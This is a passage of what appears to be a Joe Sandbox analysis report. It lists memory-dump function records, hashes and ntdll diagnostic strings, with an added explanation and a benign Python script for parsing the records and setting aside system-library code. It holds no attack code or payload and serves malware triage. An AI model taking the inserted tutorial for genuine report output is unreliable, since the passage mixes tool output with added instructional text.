                                                • Instruction ID: 46893182b0a467c9ebbb9ce91e2730e2ee55abbd582e5189bfb0166db7d5622f
                                                • Opcode Fuzzy Hash: 5bbf261f302ac3d93797d32e2437f537b7a971638510b4cc7ca8d231c34454e7
                                                • Instruction Fuzzy Hash: 7F12CF78A00745EFE7158F25C440BAABFF1FF09318F558459E4868BA81D734E889EB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                • API String ID: 0-3532704233
                                                • Opcode ID: 5681db89ba9fc022659c580429c9858abc257484115f320680d83c3e2cb9e0c9
                                                • Instruction ID: 795e1c46827d7afe9fab842dcdd481b166f281727f5c2221737255e0a0ab3208
                                                • Opcode Fuzzy Hash: 5681db89ba9fc022659c580429c9858abc257484115f320680d83c3e2cb9e0c9
                                                • Instruction Fuzzy Hash: 21B1EF759083559FEB11CF24C840A1FBBE8EF88744F42092EF988D7608DB70D949CBA6
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                • API String ID: 3446177414-3570731704
                                                • Opcode ID: f55db6c970ea90933cb3bcee5e635b61bd8144d881af38c6b347abf86b36f649
                                                • Instruction ID: c5200999426311c300c037f85e56acfae584c98cf446fa3b1407176ad2e500f0
                                                • Opcode Fuzzy Hash: f55db6c970ea90933cb3bcee5e635b61bd8144d881af38c6b347abf86b36f649
                                                • Instruction Fuzzy Hash: 53925875E11328CFEB24CF15CC40B99BBB6AF45354F1582EAD949AB290DB309E84CF52
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 36D8D959
                                                  • Part of subcall function 36D64859: RtlDebugPrintTimes.NTDLL ref: 36D648F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1975516107
                                                • Opcode ID: bf0435d329a317e45769286512bb3e734711187ff48e96b85cd6028e449e19b7
                                                • Instruction ID: 6bb08bb0074ebc17c350860720df9e421554942b377a3db4792b0fc46a23277a
                                                • Opcode Fuzzy Hash: bf0435d329a317e45769286512bb3e734711187ff48e96b85cd6028e449e19b7
                                                • Instruction Fuzzy Hash: 4951D276E00345DFEB18DFA4C88878EBBB2BF44314F245159C6116B289D774E949CF91
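The function records in this part of the report all share one layout: a Memory Dump Source line, optional API reference lines, and a Similarity block whose String ID field joins the function's strings with "$". The Python below is an added example, not Joe Sandbox or IDA-plugin code: it parses that layout from a constructed sample made of two records copied from this page, and flags records whose strings are ntdll's own diagnostic text (an assumed marker list, not a report field), which is the first pass a practitioner makes when separating system-library code in the 0x36D30000 dump from code that belongs to the sample itself. The record field names and the "$" separator are inferred from the report text.

```python
"""Parse Joe Sandbox 'Similarity' function records and flag the ones whose
strings are ntdll's own diagnostic text.

Added example, not Joe Sandbox or IDA-plugin code. The record layout is
inferred from the rendered report; NTDLL_MARKERS is an assumption used as a
triage heuristic, not a field the report provides.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: two records copied from the report text on this page.
SAMPLE = r"""
APIs
• RtlDebugPrintTimes.NTDLL ref: 36D8D959
  • Part of subcall function 36D64859: RtlDebugPrintTimes.NTDLL ref: 36D648F7
Strings
Memory Dump Source
• Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-1975516107
• Opcode ID: bf0435d329a317e45769286512bb3e734711187ff48e96b85cd6028e449e19b7
• Instruction ID: 6bb08bb0074ebc17c350860720df9e421554942b377a3db4792b0fc46a23277a
• Opcode Fuzzy Hash: bf0435d329a317e45769286512bb3e734711187ff48e96b85cd6028e449e19b7
• Instruction Fuzzy Hash: 4951D276E00345DFEB18DFA4C88878EBBB2BF44314F245159C6116B289D774E949CF91
Strings
Memory Dump Source
• Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
Similarity
• API ID:
• String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$\BaseNamedObjects$\Sessions
• API String ID: 0-3063724069
• Opcode ID: 02107bb6379231aabeffb26f250fde20fb0a17900c555b624cdeead0827c68b4
• Instruction ID: 272390b9284da8ebc7309c1b2e406b760d84b4e2ea45434e4bb70b64333d5896
• Opcode Fuzzy Hash: 02107bb6379231aabeffb26f250fde20fb0a17900c555b624cdeead0827c68b4
• Instruction Fuzzy Hash: B7D1C0B2C29311AFE721CB54C840B6BB7E8AF84754F420929F985AF250D735C948CBE3
"""

FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")          # "• Key: value"
API_REF_RE = re.compile(r"(\w+)\.(\w+) ref: ([0-9A-Fa-f]+)")      # "Name.MODULE ref: ADDR"
SOURCE_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")

# Assumed heuristic: substrings that only ntdll's own assert/debug strings carry.
NTDLL_MARKERS = ("minkernel\\ntdll", "HEAP[%wZ]", "RTL: ")


def _new_record() -> Dict:
    return {"dump_file": "", "dump_offset": "", "based_on_pe": False,
            "api_refs": [], "api_id": "", "strings": [], "opcode_id": "",
            "opcode_hash": "", "instruction_hash": ""}


def parse_records(text: str) -> List[Dict]:
    """Split the report text into one dict per function record.

    A record is closed by its 'Instruction Fuzzy Hash' line; a trailing
    record cut off before that line (as at the end of the page) is dropped.
    """
    records: List[Dict] = []
    cur = _new_record()
    for raw in text.splitlines():
        line = raw.strip()
        m = SOURCE_RE.search(line)
        if m:
            cur["dump_file"], cur["dump_offset"] = m.group(1), m.group(2)
            cur["based_on_pe"] = m.group(3) == "true"
            continue
        m = API_REF_RE.search(line)
        if m:  # covers both direct refs and "Part of subcall function" lines
            cur["api_refs"].append((m.group(1), m.group(2), m.group(3)))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "API ID":
            cur["api_id"] = value
        elif key == "String ID":
            # The report joins strings with "$"; a literal "$" inside a string
            # is therefore ambiguous, so empty fragments are simply dropped.
            cur["strings"] = [s for s in value.split("$") if s.strip()]
        elif key == "Opcode ID":
            cur["opcode_id"] = value
        elif key == "Opcode Fuzzy Hash":
            cur["opcode_hash"] = value
        elif key == "Instruction Fuzzy Hash":
            cur["instruction_hash"] = value
            records.append(cur)
            cur = _new_record()
    return records


def likely_ntdll(rec: Dict) -> bool:
    """True when any string carries an ntdll-only marker (heuristic)."""
    return any(marker in s for s in rec["strings"] for marker in NTDLL_MARKERS)


def summarize(text: str) -> List[Tuple[str, str, bool]]:
    """(dump offset, API ID, ntdll-flag) per record, for a quick pivot table."""
    return [(r["dump_offset"], r["api_id"], likely_ntdll(r)) for r in parse_records(text)]


if __name__ == "__main__":
    for offset, api_id, is_ntdll in summarize(SAMPLE):
        print(f"{offset}  api_id={api_id or '-':20}  ntdll_text={is_ntdll}")
```

Run it against a saved copy of the report's disassembly section to get one row per function; records flagged `ntdll_text=True` can be set aside before looking at instruction fuzzy hashes of the remaining code.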
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                • API String ID: 0-3063724069
                                                • Opcode ID: 02107bb6379231aabeffb26f250fde20fb0a17900c555b624cdeead0827c68b4
                                                • Instruction ID: 272390b9284da8ebc7309c1b2e406b760d84b4e2ea45434e4bb70b64333d5896
                                                • Opcode Fuzzy Hash: 02107bb6379231aabeffb26f250fde20fb0a17900c555b624cdeead0827c68b4
                                                • Instruction Fuzzy Hash: B7D1C0B2C29311AFE721CB54C840B6BB7E8AF84754F420929F985AF250D735C948CBE3
                                                Strings
                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36D5D0CF
                                                • @, xrefs: 36D5D0FD
                                                • @, xrefs: 36D5D313
                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 36D5D196
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36D5D2C3
                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36D5D146
                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36D5D262
                                                • @, xrefs: 36D5D2AF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                • API String ID: 0-1356375266
                                                • Opcode ID: 2331b7867f66e8c4b05a74649b0c92006f6fe61d085a3a801ddf3f7f3c1ddcf3
                                                • Instruction ID: 363fba4b56325bb40d66f2bd59bba55d04f6c9c0b3f6f73dc7876e78ddf70f00
                                                • Opcode Fuzzy Hash: 2331b7867f66e8c4b05a74649b0c92006f6fe61d085a3a801ddf3f7f3c1ddcf3
                                                • Instruction Fuzzy Hash: E7A17AB18083459FE721CF21C880B5BBBE8BB84755F51492EF68897644E774D908CFA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: 53ba50caa909d879c5de86f29afab7c28130c58af3546925f32bcf281000c21a
                                                • Instruction ID: 0976dc54ac6bc72099c7b2396fee4588981f5552d856889c5200c7d34eb77fe9
                                                • Opcode Fuzzy Hash: 53ba50caa909d879c5de86f29afab7c28130c58af3546925f32bcf281000c21a
                                                • Instruction Fuzzy Hash: 1542FEB56083819FEB05CF25C880A2ABBE5FF88384F154969E586CFB51DB34D845CF62
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: 2cf8dc2241fbf2c874ca026ff054da90c3742f9150185a90f958b741fbeed392
                                                • Instruction ID: 3a2f2e5c5c5144e2523ad750851ef6c7f72de54e79f56f2dec158f3f29d7ebe8
                                                • Opcode Fuzzy Hash: 2cf8dc2241fbf2c874ca026ff054da90c3742f9150185a90f958b741fbeed392
                                                • Instruction Fuzzy Hash: 84C12A71E05319AFEB148F65CC80B7E7BB5AF49308F644069E845DB290DB74C985C7A3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 6299d76c49b0aae5fb57523e13f6dd1a25bd95a8fb3e3028a423f55fa22c082f
                                                • Instruction ID: 62888cc9c3ab2bb6948761e52dc8cc09f48db32ef65148502d50a2ce99c91b28
                                                • Opcode Fuzzy Hash: 6299d76c49b0aae5fb57523e13f6dd1a25bd95a8fb3e3028a423f55fa22c082f
                                                • Instruction Fuzzy Hash: ADF1CDB4A00609DFEB15CF69D894F6AB7F5FF44304F2482A8E4459B391DB30E991CB92
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 36DD031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36DD02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36DD02E7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: cd54692290661fb16e4be4a7df15eb05d6d4352a9f7562b5e3b838ca288b71c3
                                                • Instruction ID: e6d98440d41263afe5b01e3dfefacc1d5441448570f1b6d473a506c7661c3ac7
                                                • Opcode Fuzzy Hash: cd54692290661fb16e4be4a7df15eb05d6d4352a9f7562b5e3b838ca288b71c3
                                                • Instruction Fuzzy Hash: 54E1BD74A087419FE311DF29D885B1AB7F0BF84398F200A19E5A48B2E0DB74D845CB92
                                                Strings
                                                • Kernel-MUI-Language-Allowed, xrefs: 36D8527B
                                                • WindowsExcludedProcs, xrefs: 36D8522A
                                                • Kernel-MUI-Language-SKU, xrefs: 36D8542B
                                                • Kernel-MUI-Number-Allowed, xrefs: 36D85247
                                                • Kernel-MUI-Language-Disallowed, xrefs: 36D85352
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: b2e6c43ca0098cfd9cf3d3275f5392ef38f5c8164384966556e8fc753656e74f
                                                • Instruction ID: 3c490707b3b310d7fd3cf5493348e40780e8aeffb58944dee88d1f2b395e4a27
                                                • Opcode Fuzzy Hash: b2e6c43ca0098cfd9cf3d3275f5392ef38f5c8164384966556e8fc753656e74f
                                                • Instruction Fuzzy Hash: 80F14CB6D11229EFDB01CFA9C984AEEBBB9FF48650F51415AE401E7210DB749E01CBA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 6fe1728d81f1609bc56970bbc853608c3305557fc46712a22dbb219c3b88d50e
                                                • Instruction ID: 1fe8376afe897d35f0a569721bb63b5cc6fbcd4143434663c58c1ae7d935bf87
                                                • Opcode Fuzzy Hash: 6fe1728d81f1609bc56970bbc853608c3305557fc46712a22dbb219c3b88d50e
                                                • Instruction Fuzzy Hash: 4DF12976E002259FDB08CF69C99067EFBF6EF98204B29426DD457DB380E634EA05CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                • API String ID: 0-3061284088
                                                • Opcode ID: b300d52bb1203329aba3fe4858c1bdf44d69894eb78583f0b305cff6c5deed22
                                                • Instruction ID: bef5b1b7f8db115124ea7325307631781499a99fad5db72681a1ec86461c6fff
                                                • Opcode Fuzzy Hash: b300d52bb1203329aba3fe4858c1bdf44d69894eb78583f0b305cff6c5deed22
                                                • Instruction Fuzzy Hash: 45014776416690EEE629831AD918FA67BF4DB43730F364099F1014BE90CFA8DC88CE71
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 880f9c06704443edb276b891e3c7b30eca018e949a12485fc342f0ce148d5f29
                                                • Instruction ID: 4b6216b1fe45d92f67debe7423ee5c1644be219d14b79f41a9ee4ccfc0dc1e24
                                                • Opcode Fuzzy Hash: 880f9c06704443edb276b891e3c7b30eca018e949a12485fc342f0ce148d5f29
                                                • Instruction Fuzzy Hash: F013AD74E00355CFEB14CF69C894BA9BBF1BF49304F2485A9D889AB381D734A945CF92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$.mui$.mun$SystemResources\
                                                • API String ID: 0-3047833772
                                                • Opcode ID: c30d84678058ba11c21c85181261246ca2c97008b73d7eea84b31b452be02c99
                                                • Instruction ID: 22d5a0500bff17b372cd762224465f56daf929a1073ca4f3420fc987c680a3da
                                                • Opcode Fuzzy Hash: c30d84678058ba11c21c85181261246ca2c97008b73d7eea84b31b452be02c99
                                                • Instruction Fuzzy Hash: 13624D76E003299FDB21CF55CC80BD9B7B8BB0A358F4141EAD409A7A50DB359E85CF92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                • API String ID: 0-2586055223
                                                • Opcode ID: 78440297fa16f904d5f7543dcdc6c2e2e45a8510b0c44ca7349051b33bf01c2d
                                                • Instruction ID: 6d3b47a478463f14e171fc47f127f75fa47dccebd31f49dd63ccd2a750e64a41
                                                • Opcode Fuzzy Hash: 78440297fa16f904d5f7543dcdc6c2e2e45a8510b0c44ca7349051b33bf01c2d
                                                • Instruction Fuzzy Hash: 67612176604380AFEB11CF24CC44F6B77E8EF84794F150468FA958B691CB34E845CBA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 0-336120773
                                                • Opcode ID: 6307c1d70485b2b2f5af3bf4c0cf1f6d7f34a2c2bfa806468cd800cc0c064f3a
                                                • Instruction ID: 16572f799a93a9c44ed7264c74ac6d2269f8ccf927b30c07bfba2a8f48aa1a8d
                                                • Opcode Fuzzy Hash: 6307c1d70485b2b2f5af3bf4c0cf1f6d7f34a2c2bfa806468cd800cc0c064f3a
                                                • Instruction Fuzzy Hash: 8731E179601210EFEB11CB99CC80F9ABBE8EF06768F610155F501DB690EB34EC48EA65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                • Opcode ID: 0267990ab4c9d89a6fcf8d7e32d46052f69a84201dac4c34dd67ef5a2b4bc855
                                                • Instruction ID: c253c64e0a6e35b6652846d65285c98a45bd44149627874fdcd85a97091609ee
                                                • Opcode Fuzzy Hash: 0267990ab4c9d89a6fcf8d7e32d46052f69a84201dac4c34dd67ef5a2b4bc855
                                                • Instruction Fuzzy Hash: CE31BE36A00254EFDF02CB46CC84F9EBBB8EF45760F2640A5E915AB690DB74ED44CE61
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: ed2d3dc0a8105dc2f369e226e61dac72fd27ac3daea7e95f6d42582541fe40e3
                                                • Instruction ID: 02f6bccec72b85d60607ebde27d4c815c6b8ce6ca394e5e80fe09bfb4c75327d
                                                • Opcode Fuzzy Hash: ed2d3dc0a8105dc2f369e226e61dac72fd27ac3daea7e95f6d42582541fe40e3
